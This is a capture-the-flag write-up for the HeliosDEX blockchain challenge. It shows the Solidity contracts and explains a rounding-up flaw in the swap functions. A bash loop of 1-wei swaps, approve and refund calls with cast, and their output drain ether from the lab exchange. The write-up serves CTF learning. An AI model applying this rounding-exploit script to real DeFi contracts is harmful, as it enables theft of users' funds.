~/

HTB Cyber Apocalypse CTF 2025 - HeliosDEX [blockchain]

Difficulty : Easy

Team : Phreaks 2600

Description : You stand victorious, panting, over the fallen form of Eldorion. The beast’s eternal resilience proved no match for your cunning and skill, adventurer. The path to the city gates of Eldoria now lies open, but the journey is far from over. As you approach, a shimmering structure catches your eye: the HeliosDEX, a decentralized exchange powered by the radiant energy of Helios himself. Whispers tell of travelers using this exchange to amass fortunes, stocking up on rare items and crucial supplies before braving the perils of Eldoria. Perhaps you can use this opportunity to your advantage…

Author : PerryThePwner

Topics : DEX, ERC20, Rounding

TL;DR

  • When converting ethers to MalakarEssence (MAL) or HeliosLuminaShards (HLS) token, it is rounded up to the next integer, even if we convert 0.000000000000000001 ether it gives, it is rounded up to 1 ETHER

  • Repeat the operation until we have enough token to withdraw.

  • Give enough allowance to the DEX, refund the tokens and get the ethers.

Introduction

For this challenge, we are dealing with three ERC20 contracts and a decentrized exchange (DEX) with which we can swap ethers for ERC20 tokens.

Recon

Smart Contracts

Here are the smart contracts :

Setup.sol 
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.28;

import { HeliosDEX } from "./HeliosDEX.sol";

contract Setup {
    HeliosDEX public TARGET;
    address public player;
    
    event DeployedTarget(address at);

    constructor(address _player) payable {
        TARGET = new HeliosDEX{value: 1000 ether}(1000);
        player = _player;
        emit DeployedTarget(address(TARGET));
    }

    function isSolved() public view returns (bool) {
        return player.balance >= 20 ether;
    }
}

HeliosDEX.sol 
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.28;

/***
    __  __     ___            ____  _______  __
   / / / /__  / (_)___  _____/ __ \/ ____/ |/ /
  / /_/ / _ \/ / / __ \/ ___/ / / / __/  |   / 
 / __  /  __/ / / /_/ (__  ) /_/ / /___ /   |  
/_/ /_/\___/_/_/\____/____/_____/_____//_/|_|  
                                               
    Today's item listing:
    * Eldorion Fang (ELD): A shard of a Eldorion's fang, said to imbue the holder with courage and the strength of the ancient beast. A symbol of valor in battle.
    * Malakar Essence (MAL): A dark, viscous substance, pulsing with the corrupted power of Malakar. Use with extreme caution, as it whispers promises of forbidden strength. MAY CAUSE HALLUCINATIONS.
    * Helios Lumina Shards (HLS): Fragments of pure, solidified light, radiating the warmth and energy of Helios. These shards are key to powering Eldoria's invisible eye.
***/

import "@openzeppelin/contracts/token/ERC20/ERC20.sol";
import "@openzeppelin/contracts/utils/math/Math.sol";

contract EldorionFang is ERC20 {
    constructor(uint256 initialSupply) ERC20("EldorionFang", "ELD") {
        _mint(msg.sender, initialSupply);
    }
}

contract MalakarEssence is ERC20 {
    constructor(uint256 initialSupply) ERC20("MalakarEssence", "MAL") {
        _mint(msg.sender, initialSupply);
    }
}

contract HeliosLuminaShards is ERC20 {
    constructor(uint256 initialSupply) ERC20("HeliosLuminaShards", "HLS") {
        _mint(msg.sender, initialSupply);
    }
}

contract HeliosDEX {
    EldorionFang public eldorionFang;
    MalakarEssence public malakarEssence;
    HeliosLuminaShards public heliosLuminaShards;

    uint256 public reserveELD;
    uint256 public reserveMAL;
    uint256 public reserveHLS;
    
    uint256 public immutable exchangeRatioELD = 2;
    uint256 public immutable exchangeRatioMAL = 4;
    uint256 public immutable exchangeRatioHLS = 10;

    uint256 public immutable feeBps = 25;

    mapping(address => bool) public hasRefunded;

    bool public _tradeLock = false;
    
    event HeliosBarter(address item, uint256 inAmount, uint256 outAmount);
    event HeliosRefund(address item, uint256 inAmount, uint256 ethOut);

    constructor(uint256 initialSupplies) payable {
        eldorionFang = new EldorionFang(initialSupplies);
        malakarEssence = new MalakarEssence(initialSupplies);
        heliosLuminaShards = new HeliosLuminaShards(initialSupplies);
        reserveELD = initialSupplies;
        reserveMAL = initialSupplies;
        reserveHLS = initialSupplies;
    }

    modifier underHeliosEye {
        require(msg.value > 0, "HeliosDEX: Helios sees your empty hand! Only true offerings are worthy of a HeliosBarter");
        _;
    }

    modifier heliosGuardedTrade() {
        require(_tradeLock != true, "HeliosDEX: Helios shields this trade! Another transaction is already underway. Patience, traveler");
        _tradeLock = true;  
        _;
        _tradeLock = false;
    }

    function swapForELD() external payable underHeliosEye {
        uint256 grossELD = Math.mulDiv(msg.value, exchangeRatioELD, 1e18, Math.Rounding(0));
        uint256 fee = (grossELD * feeBps) / 10_000;
        uint256 netELD = grossELD - fee;

        require(netELD <= reserveELD, "HeliosDEX: Helios grieves that the ELD reserves are not plentiful enough for this exchange. A smaller offering would be most welcome");
 
        reserveELD -= netELD;
        eldorionFang.transfer(msg.sender, netELD);

        emit HeliosBarter(address(eldorionFang), msg.value, netELD);
    }

    function swapForMAL() external payable underHeliosEye {
        uint256 grossMal = Math.mulDiv(msg.value, exchangeRatioMAL, 1e18, Math.Rounding(1));
        uint256 fee = (grossMal * feeBps) / 10_000;
        uint256 netMal = grossMal - fee;

        require(netMal <= reserveMAL, "HeliosDEX: Helios grieves that the MAL reserves are not plentiful enough for this exchange. A smaller offering would be most welcome");

        reserveMAL -= netMal;
        malakarEssence.transfer(msg.sender, netMal);

        emit HeliosBarter(address(malakarEssence), msg.value, netMal);
    }

    function swapForHLS() external payable underHeliosEye {
        uint256 grossHLS = Math.mulDiv(msg.value, exchangeRatioHLS, 1e18, Math.Rounding(3));
        uint256 fee = (grossHLS * feeBps) / 10_000;
        uint256 netHLS = grossHLS - fee;
        
        require(netHLS <= reserveHLS, "HeliosDEX: Helios grieves that the HSL reserves are not plentiful enough for this exchange. A smaller offering would be most welcome");
        

        reserveHLS -= netHLS;
        heliosLuminaShards.transfer(msg.sender, netHLS);

        emit HeliosBarter(address(heliosLuminaShards), msg.value, netHLS);
    }

    function oneTimeRefund(address item, uint256 amount) external heliosGuardedTrade {
        require(!hasRefunded[msg.sender], "HeliosDEX: refund already bestowed upon thee");
        require(amount > 0, "HeliosDEX: naught for naught is no trade. Offer substance, or be gone!");

        uint256 exchangeRatio;
        
        if (item == address(eldorionFang)) {
            exchangeRatio = exchangeRatioELD;
            require(eldorionFang.transferFrom(msg.sender, address(this), amount), "ELD transfer failed");
            reserveELD += amount;
        } else if (item == address(malakarEssence)) {
            exchangeRatio = exchangeRatioMAL;
            require(malakarEssence.transferFrom(msg.sender, address(this), amount), "MAL transfer failed");
            reserveMAL += amount;
        } else if (item == address(heliosLuminaShards)) {
            exchangeRatio = exchangeRatioHLS;
            require(heliosLuminaShards.transferFrom(msg.sender, address(this), amount), "HLS transfer failed");
            reserveHLS += amount;
        } else {
            revert("HeliosDEX: Helios descries forbidden offering");
        }

        uint256 grossEth = Math.mulDiv(amount, 1e18, exchangeRatio);

        uint256 fee = (grossEth * feeBps) / 10_000;
        uint256 netEth = grossEth - fee;

        hasRefunded[msg.sender] = true;
        payable(msg.sender).transfer(netEth);
        
        emit HeliosRefund(item, amount, netEth);
    }
}

Reading the code

Setup.sol

1
2
3
4
5

constructor(address _player) payable {
    TARGET = new HeliosDEX{value: 1000 ether}(1000);
    player = _player;
    emit DeployedTarget(address(TARGET));
}

First, the setup contract is deployed and it deploys itself an HeliosDEX contract and transfers it 1000 ethers and 1000 in argument.

Also, the solve function only check if the player (us), have at least 20 ethers. So we can guess we have to steal ethers.

1
2
3

function isSolved() public view returns (bool) {
    return player.balance >= 20 ether;
}

Let’s look at the HeliosDEX contracts.

HeliosDEX.sol

Before diving in the code, we must know what a DEX and ERC20 are.

Definitions

DEX in a nutshell

To sum up, a DEX is a platform with smart contracts working on the backend that provides an automated way to swap a token for one another. (example : ETH for ELD, the token created for this challenge).

uniswap interface.

So we can transfer ethers and get a certain amount of tokens, paying micro fees for each transaction.

ERC20 in a nutshell

ERC20 is a standard defining “Fongible Token” (FT) in the ethereum network.

Example functionalities ERC-20 provides:

  • transfer tokens from one account to another

  • get the current token balance of an account

  • get the total supply of the token available on the network

  • approve whether an amount of token from an account can be spent by a third-party account

source : ethereum dev docs

The difference with the well-knowns “NFT” (ERC-721), is that NFTs or Non-Fongible Tokens cannot be replaced with another identical token, while a Fongible-Tokens can be replaced. For instance you can replace a “ELD” token with another identical “ELD” token.

The public functions defined for ERC20 tokens are the following :

1
2
3
4
5
6
7
8
9

function name() public view returns (string)
function symbol() public view returns (string)
function decimals() public view returns (uint8)
function totalSupply() public view returns (uint256)
function balanceOf(address _owner) public view returns (uint256 balance)
function transfer(address _to, uint256 _value) public returns (bool success)
function transferFrom(address _from, address _to, uint256 _value) public returns (bool success)
function approve(address _spender, uint256 _value) public returns (bool success)
function allowance(address _owner, address _spender) public view returns (uint256 remaining)

These functions are documented in the openzeppelin documentation.

An address have its token balance in the balanceOf[account] mapping on a token.

There is another mapping, allowance[account][spender], which stores the token amount from an account, a third-party account is allowed to spend.

The contract

Constructors

3 Tokens are created following the ERC20 standard, “ELD”, “MAL” and “HLS”.

The contracts are named EldorionFang, MalakarEssence and HeliosLuminaShards :

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20

import "@openzeppelin/contracts/token/ERC20/ERC20.sol";
import "@openzeppelin/contracts/utils/math/Math.sol";

contract EldorionFang is ERC20 {
    constructor(uint256 initialSupply) ERC20("EldorionFang", "ELD") {
        _mint(msg.sender, initialSupply);
    }
}

contract MalakarEssence is ERC20 {
    constructor(uint256 initialSupply) ERC20("MalakarEssence", "MAL") {
        _mint(msg.sender, initialSupply);
    }
}

contract HeliosLuminaShards is ERC20 {
    constructor(uint256 initialSupply) ERC20("HeliosLuminaShards", "HLS") {
        _mint(msg.sender, initialSupply);
    }
}

And their constructor tells that their initial supply (the total number of tokens for each) is defined with a variable.

Let’s look at the HeliosDEX contract constructor :

1
2
3
4
5
6
7
8

constructor(uint256 initialSupplies) payable {
    eldorionFang = new EldorionFang(initialSupplies);
    malakarEssence = new MalakarEssence(initialSupplies);
    heliosLuminaShards = new HeliosLuminaShards(initialSupplies);
    reserveELD = initialSupplies;
    reserveMAL = initialSupplies;
    reserveHLS = initialSupplies;
}

The three tokens share the same amount of initial supply which is defined by the variable initialSupplies passed to the HeliosDEX constructor.

The latter is deployed by the setup contract, which set an initial supply of 1000 tokens :

1

TARGET = new HeliosDEX{value: 1000 ether}(1000);
swap functions

There are three swap functions for each token.

swap functions 
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39

function swapForELD() external payable underHeliosEye {
    uint256 grossELD = Math.mulDiv(msg.value, exchangeRatioELD, 1e18, Math.Rounding(0));
    uint256 fee = (grossELD * feeBps) / 10_000;
    uint256 netELD = grossELD - fee;

    require(netELD <= reserveELD, "HeliosDEX: Helios grieves that the ELD reserves are not plentiful enough for this exchange. A smaller offering would be most welcome");

    reserveELD -= netELD;
    eldorionFang.transfer(msg.sender, netELD);

    emit HeliosBarter(address(eldorionFang), msg.value, netELD);
}

function swapForMAL() external payable underHeliosEye {
    uint256 grossMal = Math.mulDiv(msg.value, exchangeRatioMAL, 1e18, Math.Rounding(1));
    uint256 fee = (grossMal * feeBps) / 10_000;
    uint256 netMal = grossMal - fee;

    require(netMal <= reserveMAL, "HeliosDEX: Helios grieves that the MAL reserves are not plentiful enough for this exchange. A smaller offering would be most welcome");

    reserveMAL -= netMal;
    malakarEssence.transfer(msg.sender, netMal);

    emit HeliosBarter(address(malakarEssence), msg.value, netMal);
}

function swapForHLS() external payable underHeliosEye {
    uint256 grossHLS = Math.mulDiv(msg.value, exchangeRatioHLS, 1e18, Math.Rounding(3));
    uint256 fee = (grossHLS * feeBps) / 10_000;
    uint256 netHLS = grossHLS - fee;
    
    require(netHLS <= reserveHLS, "HeliosDEX: Helios grieves that the HSL reserves are not plentiful enough for this exchange. A smaller offering would be most welcome");
    

    reserveHLS -= netHLS;
    heliosLuminaShards.transfer(msg.sender, netHLS);

    emit HeliosBarter(address(heliosLuminaShards), msg.value, netHLS);
}

Each function has the modifier underHeliosEye which we’ll see later, and they have the same process, only some variables differ.

Let’s take the first one, swapForELD() :

1
2
3

uint256 grossELD = Math.mulDiv(msg.value, exchangeRatioELD, 1e18, Math.Rounding(0));
uint256 fee = (grossELD * feeBps) / 10_000;
uint256 netELD = grossELD - fee;

The “gross” value of token is computed with Math.mulDiv(x, y, denominator, rounding) from openzeppelin which calculates $ \frac{x * y}{denominator} $ and round the results with the rounding direction (up or down).

  • x is the value we send
  • y is the exchangeRatio, which is the answer to “how many token I get for ether”, it is different for each tokens and for ELD it is 2 (defined in HeliosDEX contract)
  • denominator is $10^{18}$ (1 ether in wei)
  • rounding is Math.Rounding(0)

Then, the fees are computed with the following :

$$ fee = \frac {(grossELD * feeBps)}{10000} $$

with feeBps = 25 (defined in HeliosDEX contract) :

$$ fee = \frac {(grossELD * 25)}{10000} $$

We can also rewrite it like that :

$$ fee = grossELD * \frac{25}{10000} $$$$ \ $$$$ fee = grossELD * 0.25 \% $$

And we subtract the grossELD by these fees to get the net value of token we get :

$$ netELD = grossELD - fee $$$$ netELD = grossELD - grossELD * 0.25 \% $$

Meaning we lost 0.25% of the value we send in fees which is not so much.

After these formalities, the contract checks if there are enough token to give us in the total supply, if yes, it subtract the quantity of tokens wanted from the total supply.

And finally, the netELD tokens amount is transferred to our balance on balanceOf[address].

1
2
3
4

require(netELD <= reserveELD, "HeliosDEX: Helios grieves that the ELD reserves are not plentiful enough for this exchange. A smaller offering would be most welcome");

reserveELD -= netELD;
eldorionFang.transfer(msg.sender, netELD);

And the tokens are transferred to our balance on balanceOf[address]

This process is the same for the tree tokens except from two differences, the exchange ratio and the rounding direction :

  • for ELD : ratio = 2, and rounding direction is 0
  • for MAL : ratio = 4, and rounding direction is 1
  • for HLS : ratio = 10, and rounding direction is 3

So for 1 Ether I get around 2 ELD, 4 MAL and 10 HLS. But for 0.99 Ether, I get 0 ELD, 4 MAL and 10 HLS, due to the rounding direction. With a positive value, the result is rounded up, if zero, it is rounded down.

Before I mentioned the underHeliosEye modifier applied to every swap function:

1
2
3
4

modifier underHeliosEye {
    require(msg.value > 0, "HeliosDEX: Helios sees your empty hand! Only true offerings are worthy of a HeliosBarter");
    _;
}

The latter makes sure we send at least 1 wei of value to swap.

This done, let’s look at the oneTimeRefund function used to refund our tokens and get back ethers.

withdraw function
oneTimeRefund(address item, uint256 amount) 
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32

function oneTimeRefund(address item, uint256 amount) external heliosGuardedTrade {
    require(!hasRefunded[msg.sender], "HeliosDEX: refund already bestowed upon thee");
    require(amount > 0, "HeliosDEX: naught for naught is no trade. Offer substance, or be gone!");

    uint256 exchangeRatio;
    
    if (item == address(eldorionFang)) {
        exchangeRatio = exchangeRatioELD;
        require(eldorionFang.transferFrom(msg.sender, address(this), amount), "ELD transfer failed");
        reserveELD += amount;
    } else if (item == address(malakarEssence)) {
        exchangeRatio = exchangeRatioMAL;
        require(malakarEssence.transferFrom(msg.sender, address(this), amount), "MAL transfer failed");
        reserveMAL += amount;
    } else if (item == address(heliosLuminaShards)) {
        exchangeRatio = exchangeRatioHLS;
        require(heliosLuminaShards.transferFrom(msg.sender, address(this), amount), "HLS transfer failed");
        reserveHLS += amount;
    } else {
        revert("HeliosDEX: Helios descries forbidden offering");
    }

    uint256 grossEth = Math.mulDiv(amount, 1e18, exchangeRatio);

    uint256 fee = (grossEth * feeBps) / 10_000;
    uint256 netEth = grossEth - fee;

    hasRefunded[msg.sender] = true;
    payable(msg.sender).transfer(netEth);
    
    emit HeliosRefund(item, amount, netEth);
}

The contracts check if we already refunded our token and if the amount to refund is greater than zero.

1
2

require(!hasRefunded[msg.sender], "HeliosDEX: refund already bestowed upon thee");
require(amount > 0, "HeliosDEX: naught for naught is no trade. Offer substance, or be gone!");

After that, the exchange ratio is set according to the token we want to refund and the supply of token is increased, example for ELD :

1
2
3
4
5

if (item == address(eldorionFang)) {
    exchangeRatio = exchangeRatioELD;
    require(eldorionFang.transferFrom(msg.sender, address(this), amount), "ELD transfer failed");
    reserveELD += amount;
}

The tokens are transferred back from us to the contract, but if we have not enough balance or the contract has not enough allowance on our balance, the execution is reverted.

Then the amount of ethers subtracted by the fees is computed and transferred to us :

1
2
3
4
5
6
7

uint256 grossEth = Math.mulDiv(amount, 1e18, exchangeRatio);

uint256 fee = (grossEth * feeBps) / 10000;
uint256 netEth = grossEth - fee;

hasRefunded[msg.sender] = true;
payable(msg.sender).transfer(netEth);

For example for ELD :

$$ netETH = grossETH - fee $$$$ netETH = \frac {amount * 10^{18}}{2} - (\frac {amount * 10^{18}}{2}) * 0.25 \% $$

In shorts we get the amount of ELD token divided by 2, subtracted by 0.25% of fees.

And our address is set to refunded and we receive the ethers afterward. So we can refund one time for every tokens.

This refund function is under the heliosGuardedTrade modifier :

1
2
3
4
5
6

modifier heliosGuardedTrade() {
    require(_tradeLock != true, "HeliosDEX: Helios shields this trade! Another transaction is already underway. Patience, traveler");
    _tradeLock = true;  
    _;
    _tradeLock = false;
}

Which ensures we can’t perform a reeantrancy attack.

Solving

Vulnerability

As we saw earlier, the swap functions either round up or round down the value we sent it.

We can test it out with a test contract to mimic the sending of the funds:

Test contract 
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.28;

import "@openzeppelin/contracts/utils/math/Math.sol";

contract Test {

    uint256 public immutable feeBps = 25;

    function roundWithFees() payable  public returns (uint256, uint256, uint256){

        uint ELD = Math.mulDiv(msg.value, 2, 1e18, Math.Rounding(0));
        ELD = ELD - ((ELD * feeBps) / 10_000);

        uint MAL = Math.mulDiv(msg.value, 4, 1e18, Math.Rounding(1));
        MAL = MAL - ((MAL * feeBps) / 10_000);

        uint HLS = Math.mulDiv(msg.value, 10, 1e18, Math.Rounding(3));
        HLS = HLS - ((HLS * feeBps) / 10_000);

        return (ELD, MAL, HLS);
    }
}

Calling roundWithFees() with a value of 1 ether we get :

1
2
3
4
5

{
	"0": "uint256: 2",
	"1": "uint256: 4",
	"2": "uint256: 10"
}

2 ELD, 4 MAL and 10 HLS.

With 0.99 ether :

1
2
3
4
5

{
	"0": "uint256: 1",
	"1": "uint256: 4",
	"2": "uint256: 9"
}

Calling the test function with the minimal value (1 wei) still give us MAL and HLS token.

1
2
3
4
5

{
	"0": "uint256: 0",
	"1": "uint256: 1",
	"2": "uint256: 1"
}

Remembering the code :

1

Math.mulDiv(msg.value, exchangeRatioMAL, 1e18, Math.Rounding(1));

For a minimal msg.value sent, we still get this result for MAL:

$$ \frac {1 * 4}{10^{18}} = 4\times10^{-18} = 0.000000000000000004 $$

But rounded up, it gives us the next upper integer value which is 1.

The value is rounded up if in Math.mulDiv(x), x > 0.

So to solve the challenge, we can generate many MAL or HLS tokens by sending 1 wei to swap, and after having gathered enough token, refund.

For 100 MAL tokens we get around $ \frac {100}{4} = 25 $ ethers.

I wrote a shell scripts to swap 100 tokens automatically :

get-tokens.sh 
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15

#!/bin/bash

RPC=http://83.136.254.234:35168
PKEY=0xe32e96dfb77ba63e8b86ad868fbfb28121d72f0e9668b6a1e5e6d7896e70af75
ADDRESS=0x36D32AdDc84ea8E7Fa2A395758DED00723EdA39b
TARGET=0xE599FaEC47C3Fb9c4a0567e2D9f1adF809ceD0f8
SETUP=0xe760faEd9Ee729fc7746eB4f08D387A4635e5e45

MAL=$(cast call -r $RPC $TARGET "malakarEssence()(address)")
for item in {1..100}
do
	echo "$(cast send -r $RPC $TARGET --private-key $PKEY --value 1wei 'swapForMAL()')" 
done

cast call -r $RPC $MAL "balanceOf(address)(uint256)" $ADDRESS

After that, I have to call oneTimeRefund for the wanted token (MAL) and for a wanted amount, for that i have to :

  • retrieve the address of the MAL token address.
  • allow the DEX to transfer 100 tokens with the approve function.

Getting the flag

To send transactions and make calls I use foundry

  • I run the bash script to get the 100 tokens
1

./make-transactions.sh
  • We retrieve the MalakarEssence contract address :
1
2

cast call -r $RPC $TARGET "malakarEssence()(address)"
0x07898d9BfdC387b068b52aC04132392bBB7E8dbB
  • And from there I can check my balance (I have 100 MAL tokens) :
1
2

cast call -r $RPC 0x07898d9BfdC387b068b52aC04132392bBB7E8dbB  "balanceOf(address)(uint256)" $ADDRESS
100
  • For the challenge we start at 12 ETH, and after swapping 100 tokens I didn’t even lose 1 ETH :
1
2

cast balance -r $RPC $ADDRESS --ether
11.995278699999999900
  • Now I have to set the allowance for the DEX so it can get the tokens from my balance in order to refund me.

Because it is actually at 0 :

1
2

cast call -r $RPC 0x07898d9BfdC387b068b52aC04132392bBB7E8dbB  "allowance(address,address)(uint)" $ADDRESS $TARGET
0

I set it at 100 for the 100 tokens I swapped :

1

cast send -r $RPC 0x07898d9BfdC387b068b52aC04132392bBB7E8dbB --private-key $PKEY "approve(address, uint256)" $TARGET 100

The allowance is now at 100 :

1
2

cast call -r $RPC 0x07898d9BfdC387b068b52aC04132392bBB7E8dbB  "allowance(address,address)(uint)" $ADDRESS $TARGET
100

And I can now call the refund :

1

cast send -r $RPC $TARGET --private-key $PKEY "oneTimeRefund(address,uint)" 0x07898d9BfdC387b068b52aC04132392bBB7E8dbB  100

I now have 36 ETH which are enough to solve:

1
2

cast balance -r $RPC $ADDRESS --ether
36.932588460999999900

FLAG : HTB{0n_Heli0s_tr4d3s_a_d3cim4l_f4d3s_...}

References